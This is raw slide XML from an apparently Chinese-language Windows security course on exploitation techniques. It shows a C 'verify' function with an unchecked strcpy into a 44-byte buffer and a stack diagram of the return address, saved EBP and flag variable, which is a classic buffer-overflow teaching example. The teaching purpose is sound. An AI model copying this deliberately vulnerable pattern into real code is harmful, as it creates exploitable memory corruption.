                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Windows</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安全防护</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{431DD1B1-9AF3-0EBA-E485-A557D7D0AB1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3287688" y="4378777"/>
            <a:ext cx="5976664" cy="576064"/>
            <a:chOff x="3215680" y="2204864"/>
            <a:chExt cx="5976664" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA052E4A-F873-7074-3063-08B572C01B7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3215680" y="2204864"/>
              <a:ext cx="1440160" cy="576064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00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Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1"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85ECFDD-4396-7AAB-873D-FD731FAFBFF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4655840" y="2204864"/>
              <a:ext cx="4536504" cy="576064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D6D6D6"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent3"/>
            </a:lnRef>
            <a:fillRef idx="2">
              <a:schemeClr val="accent3"/>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent3"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="dk1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>漏洞利用技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88125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666569-C61F-C7C9-9F98-24F47BDB2E1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="692696"/>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3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>       示例</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="320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5227216-9298-D6C7-28C5-CCD86BB64F05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6741368"/>
            <a:ext cx="12192000" cy="116632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0048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C0F44430-9A0B-4002-7AEA-7A41764A1036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313488" y="1062089"/>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A5FFB534-A007-DC6E-779C-C54B198959B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450969" y="1158396"/>
            <a:ext cx="2533322"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verify</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数调用栈</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D4B131-9145-70B2-D459-8D1562DD0E27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773943" y="1052513"/>
            <a:ext cx="5111750" cy="5256212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D6D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BE8C699-A77C-3E53-9C84-CB15CBDB5D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1148820"/>
            <a:ext cx="1637500" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Verify</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF7F3EEC-A829-774B-DD7C-0E4D6F2AD0EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="1989454"/>
            <a:ext cx="1440160" cy="3906191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="004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634405ED-77B7-8900-3819-0DC4A06E6C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022617" y="2008830"/>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高地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FE5A80F-0D98-57BF-F8F3-AC3B2FEB4263}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7026098" y="5540997"/>
            <a:ext cx="800219"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低地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21C3DA8-E8F8-B316-DE0E-4876DECD1504}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="273343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2C92651-8B81-11E6-B322-8890A9A429E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8257593" y="2363949"/>
            <a:ext cx="1005403"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返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{525D05F3-BF4D-E0A8-83C8-969ED09F55D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8296865" y="2754158"/>
            <a:ext cx="926857"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old</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>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4" name="直线连接符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A7660E4-D29A-FEB0-5F21-D0C1FE3EDB29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040214" y="3101337"/>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FE0CE531-ECDC-0FEF-010E-29B0690DEADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8482813" y="3123649"/>
            <a:ext cx="554960"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flag</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6" name="直线连接符 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63731B68-A5C3-60EF-683C-5D1ECF9D6037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="3462203"/>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410DE025-7AFF-8E9E-070F-2227F954C46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8028412" y="3491150"/>
            <a:ext cx="148630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buffer[40-43]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28" name="直线连接符 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76D3B40-6271-E7B3-A4E0-2598B662958F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="385533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124325F-F894-BA79-5627-0C5FB7AA3303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9919439" y="2762783"/>
            <a:ext cx="550151"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EBP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1" name="直线箭头连接符 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64C80A6-648B-A7B7-DBC3-48A8E5C2473F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9651517" y="2923435"/>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DBA1C1F-3ED4-E371-451F-36EF1DB13226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984432" y="5563979"/>
            <a:ext cx="540533"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ESP</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3" name="直线箭头连接符 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86665E0A-A96C-3826-6F56-82C3B26C3581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9670569" y="5733256"/>
            <a:ext cx="267922" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0048A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8244945D-2598-5372-D8A8-47490840DC7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040216" y="4273112"/>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578DFBC-8BFE-DBB7-F778-9B7288BFAE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8604691" y="3849399"/>
            <a:ext cx="333746"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a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">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6799476F-C8C5-EA96-090B-7C3104EC07C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148637" y="4294188"/>
            <a:ext cx="124585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buffer[4-7]</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7" name="直线连接符 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42392020-CAE4-C878-DAC4-43749F7651D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051484" y="4672874"/>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4092EAB-4507-C6F7-14CE-14C2247A108E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8160438" y="4717255"/>
            <a:ext cx="1245854" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>buffer[0-3]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="直线连接符 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A19884C9-4497-8A79-B71F-5B7FAA940491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8040213" y="5097226"/>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2C7E39FB-7190-518E-5603-CF9757560F68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1929217"/>
            <a:ext cx="4824536" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>verify</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>code</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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN"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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>44</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>flag=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(REGCODE, code);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(buffer, code);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> flag; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:b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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="直线连接符 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27DAEDFC-6E75-06B3-AE73-D152D2AA1B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
